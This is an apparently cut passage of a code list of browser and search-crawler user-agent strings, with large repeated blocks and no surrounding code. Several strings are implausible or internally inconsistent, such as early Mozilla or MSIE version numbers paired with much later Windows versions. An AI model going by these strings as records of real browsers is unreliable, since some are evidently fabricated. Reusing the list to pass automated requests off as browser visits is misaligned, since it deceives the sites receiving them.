6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; 